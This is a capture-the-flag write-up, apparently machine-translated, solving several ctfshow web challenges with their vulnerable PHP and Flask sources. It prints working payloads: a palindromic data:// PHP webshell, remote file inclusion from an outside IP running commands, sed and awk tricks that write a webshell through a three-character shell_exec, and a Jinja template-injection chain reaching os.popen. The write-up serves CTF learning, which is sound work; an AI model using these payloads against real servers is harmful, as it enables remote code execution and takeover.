0x00 Preface

I think of the race before Bachelor's cup is not finished Just in time to reproduce

0x01 brain.md

Web Sign in

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    
    if(strrev($file)==$file){
    
        include $file;
    }

}

data The pseudo agreement goes directly through ?> Just cut it off

poc

data://text/plain,<?php system($_GET[1]);?>>?;)]1[TEG_$(metsys php?<,nialp/txet//:atad

file=http://1.15.67.48/data.txt?1==1?txt.atad/84.76.51.1//:ptth&1=whoami

For remote inclusion ? Parameters can also contain

easyphp

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

Three word length command The parameter length is arbitrary

Function description

escapeshellcmd

(PHP 4, PHP 5, PHP 7, PHP 8)

escapeshellcmd — shell Metacharacter escape

explain escapeshellcmd(string $command): string escapeshellcmd() It's possible to cheat on strings
shell Command to execute any command character escape . This function ensures that the data entered by the user is transferred to exec() or system() function , perhaps Execution operator
Escape before .

Backslash （\） Will insert... Before the following characters ： &#;`|*?~<>^()[]{}$, \x0A and \xFF. ’ and "
Escaped only when they don't deserve it . stay Windows On the platform , All these characters and % and ! Characters are replaced by spaces .

escapeshellarg

Ensure that the incoming string

(PHP 4 >= 4.0.3, PHP 5, PHP 7, PHP 8)

escapeshellarg — Transcoding a string so that it can be used in shell The parameters used in the command

explain escapeshellarg(string $arg): string escapeshellarg()
Will add a single quotation mark to the string and can reference or transcode any existing single quotation marks , This ensures that a string can be passed directly into shell
function , And it's safe . This function should be used for some parameters entered by the user .shell Function contains exec(), system() The execution operator .

sed

Reference resources sed course
technological process ：

Read row -> perform -> Show -> Read row -> perform -> Show -> … -> Read row -> perform -> Show

sed Workflow

sed From the input stream （ file 、 The Conduit 、 Standard input stream ） Read from a line And stored in a file called pattern buffer In the internal buffer of .
sed Another private buffer is also opened in the memory hold buffer Used to save processed data for later retrieval .

The execution of each cycle ends ,sed It will be emptied pattern buffer The contents of the buffer , but hold buffer The contents of the buffer are not emptied .

hold buffer Buffers are used to store processed data ,sed The command does not handle the data here .

sed You can directly output the contents of the source file without any statements

With the original intention of learning what you need
Let's see payload To learn

cmd=sed&param=/esca/d;s/shell_exec/system/g;w 1.php

sed Support regular matching /esca/ Match to escape That's ok d Delete them
sed Sentence use ; Interval on
s String substitution shell_exec -> system
g Replace flags for global

g The logo is often called Global replace flag .

A substitution that uses the global substitution flag is also called Greedy mode .

Global replace flag g The syntax of is as follows

[address1[,address2]]s/search/replacement/g

w write in --> Can be seen as cp Feature edition of

take payload Combine

sed 'param=/esca/d;s/shell_exec/system/g;w 1.php' index.php

Read index.php Remove esca… That's ok Global replacement shell_exec character string by system
Last w write in 1.php
done

Official expectations

cmd=sed&param=/php\|POST\|exec/!d;w 1.php

I read the tutorial I changed my way to simplify it

sed '/php\|POST\|exec/ w 2.php' index.php

Output and 1.php equally

awk

technological process

Start -> Read -> perform -> Read -> perform -> … -> Read -> perform -> end

You can see begin and end Statement is executed only once


AWK Command line
AWK The most common way to use it is to input directly in the terminal AWK Script .

awk [options] file …
Use directly on the command line , We need to talk about AWK Code using Single quotation marks ( ‘’ ) Lead up .

such as

awk ‘{print}’ employee.txt

Print out the source file

Same from payload Start learning
Belch It turns out that you can execute orders directly

awk '{system("whoami")}' index.php

But in web The echo is not visible at the end
Take it and write it directly

Article reference

https://www.twle.cn/c/yufei/sed/sed-basic-regular-expressions.html
http://landasika.top/2022/05/25/ctfshow-dan-shen-bei/#web2_easyPHP

Marriage test

/source Get hint
waf

def is_hacker(string):
	""" All those fancy things waf What's the use , It's not as good as this one , Direct elimination SSTI"""
	if "{" in string and "}" in string :
		return True
	else:
		return False

and determine Consider splicing the front and back curly braces , Use single quotation marks to follow

poc:

/result?boy_name={
    {
    '&girl_name='.__class__.__base__.__subclasses__()[81].__init__.__globals__.__import__('os').popen('whoami').read()}}

blog

Jiawa or something must be next time
This hole must be mended ！

0x02 rethink

Jiawa Jiawa Jiawa